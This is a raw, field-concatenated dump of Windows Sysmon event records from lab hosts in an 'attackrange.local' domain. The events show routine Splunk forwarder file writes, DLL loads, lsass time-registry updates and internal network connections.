AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000057345065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.154{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.154{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7BA17585B204780B29FA2E9C1A26CC3,SHA256=5B85F281A03CDB2FC7708E62BEBC3C9EA820E43CD80429A8BBB62F60AFB6D883falsetrue 534500x800000000000000057345063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.107{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057345062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.107{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057345061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.107{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:12.107{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x800000000000000021219455Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:13.883{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9396684DC07891534E02109EFF28BD7,SHA256=52029D1FA272B32AE4B10D72A5D47E01D95A0B6D02C13428EBDF7CB3320454B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:13.437{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:13.437{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D7F44CB70D462B24B241EE4F15E9AD8,SHA256=4B6B470AF2F98DCA9955AA2AB5067CD62D65846D88CA5DD935234803FBC1C7C4falsetrue 23542300x800000000000000021219454Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:13.211{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFE36EA74DCE5CAF5C444FAF72FF3F06,SHA256=BBE851153E28AC6A87223B4C9C5B38F8A5B088DCF4DF6F151DC0DC98C68A8B84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219456Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:14.884{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B34DA958035FE2E5E7BDCBE0049283C,SHA256=059F0572491438712810008D808834533E1D82B6A0F8F9E44E27CD97CD2762B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:14.569{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-10-11 18:55:38.088 23542300x800000000000000057345072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:14.569{8B6011A9-886D-6164-1200-00000000F101}460NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BC5BBD52C2CC506AC2F5B9AD057EEBB3,SHA256=96126604D156AC6F649C8F872237FA70EBBBE0D9611B42CEF7EB4FEC36CD9B83falsetrue 11241100x800000000000000057345071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:14.453{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:14.453{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AC6BD3126C2CA6C4743EE466F550265,SHA256=3186B7BCE954450C2FE61CF160838F454575B2E91419FE2E6D6415BDB960B96Ffalsetrue 23542300x800000000000000021219457Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:15.884{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C035634D526E67E58CCDD0A62846DE5B,SHA256=98184DC914D4946AC50F434C728F59A845E6395E51E5A619DCB35EDC90781E3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:46.540{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54528-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057345077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:15.468{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:15.468{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81DF25CFEEC1E7579B115351F4D52C27,SHA256=A980161DE78B6E9274C17C53C79087C105CE8D9988C869872F644C5CCADE5FC2falsetrue 11241100x800000000000000057345075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:15.205{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:15.205{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B70E48D634194C116B803B3AB7038452,SHA256=86BA21F57E54992782B4F4F91E0D17AD3C43685897F0B8D30D52C729C16A4869falsetrue 23542300x800000000000000021219459Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:16.884{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADDACD8CCCDBDF26E23BDD7C093BFDC5,SHA256=7F6826B012E321F3C8EE86F39E79E9900DB466F35B4CCC2C3B51B29BAF313021,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:16.468{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:16.468{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=975E9AD53ED157D44A5FC7CE41ED51D7,SHA256=DEF036A2100271D2A4A612D44DE28D9D086F9E4FA15EC21C1A8453A8FF17D8E4falsetrue 23542300x800000000000000021219458Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:16.165{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6802618DACC86F9825A601AEB3C46C46,SHA256=ECC016760F5D0DBE03BCDDECEBFB522DFCABD28CB52F8A97C4C2B40B53ECA930,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219461Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:17.884{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDD993D849F68C957169362DC9B7A9A,SHA256=25BE363EB2718B212080CF21B2A8D3BB3F19DD09BECC566BEE9F573867265BC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:17.486{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:17.485{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57FBB1E3906A2192ECCD620FAF06210C,SHA256=4B4FE29B7FF1C79564F33E98598C3366292A2175EDA91F2305CCA3E10F51C086falsetrue 354300x800000000000000021219460Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:03.569{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64312-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219463Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:18.930{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7E53DC118D7D9057313AAB88A4A815C,SHA256=4087468905EFFA36E101D32EEB744AC90343DE4CF86D53FF5869C68C1E6D428F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:18.504{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:18.504{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D74902612C94C8FDAB57A454B8F9824,SHA256=1ED10DA6713718E5EC55B0BA9FC074AFE71D34E1F4ABA20F33195AF64AF20F3Cfalsetrue 23542300x800000000000000021219462Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:18.823{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\respondent-20210916142702-79907MD5=8085950F126672766A1DF0580C539A31,SHA256=836015C54DD1F9176CE157D9E23B9B47C196C9CF50DD587B63CC20EE15FEF46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057345084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:18.383{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057345083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:16:18.383{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 23542300x800000000000000021219465Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:19.961{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91EC72ECB88FFC259960CB85B31ACF45,SHA256=CE2E40A887C57B18124A64C0C8EC47FCDBC5F10E70FA97334105F23AF1E947B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:19.520{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:19.520{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E6AA0F8392ADDA874C465D3A3F156A,SHA256=9A059B6567829083235864409134C845F4359558C166729088A0FCB2FA5E4D4Ffalsetrue 23542300x800000000000000021219464Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:19.822{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\surveyor-20210916142700-79908MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:19.405{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:19.405{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C833AE0FF2405F7577C750717C99323C,SHA256=8049DB7DD8CF6DC4E983541E9BAC0B4FAE707C1E30BA506D999778CDE544E8A8falsetrue 23542300x800000000000000021219476Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:20.980{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43DC90E9DB803CDF36B7DF8B37019517,SHA256=F5ED290F41DDE80D1A4881BE0FB576ED6834F6B98FA9D9EDE00ABA271C14F86A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:20.550{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:20.550{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D02D450E5432383C82C30D0EB57F456,SHA256=EBD7BD3E86478D2C25D7A738AAC9C1A28897EF8BA19CE75DAB73A2F565DD16EEfalsetrue 13241300x800000000000000021219475Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000021219474Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000001-0x2513acf6) 13241300x800000000000000021219473Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7d7b6-0xb82f5fc5) 13241300x800000000000000021219472Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7d7bf-0x19f3c7c5) 13241300x800000000000000021219471Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7d7c7-0x7bb82fc5) 13241300x800000000000000021219470Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000021219469Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000001-0x2513acf6) 13241300x800000000000000021219468Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7d7b6-0xb82f5fc5) 13241300x800000000000000021219467Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7d7bf-0x19f3c7c5) 13241300x800000000000000021219466Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:20.605{AD5E2759-5432-6143-0B00-00000000F101}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7d7c7-0x7bb82fc5) 354300x800000000000000057345092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:50.735{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54529-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 354300x800000000000000057345091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:50.735{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54529-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 23542300x800000000000000021219477Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:21.980{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E804EBF1DEFAF8DE03B5E8835CAAA2D,SHA256=8CDCAA64EACCA150F16BC903208A173DF24EC46D599BB6469CC3619FE4D9E595,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:21.565{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:21.565{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D8B67F91D7CE6ACA5F6CBA12B491A43,SHA256=CB21A574493729A30EE19734E63366CD6EC5277B64BD94D59A8F0F331F685E4Efalsetrue 354300x800000000000000057345095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:51.588{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54530-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219480Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:22.980{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E2B81AC30FD0C3B69E163959BEA366F,SHA256=3E1A9511C363741D760067A32C116DA9D973B7BBFC97476F6F4D13C7253B2181,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:22.584{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 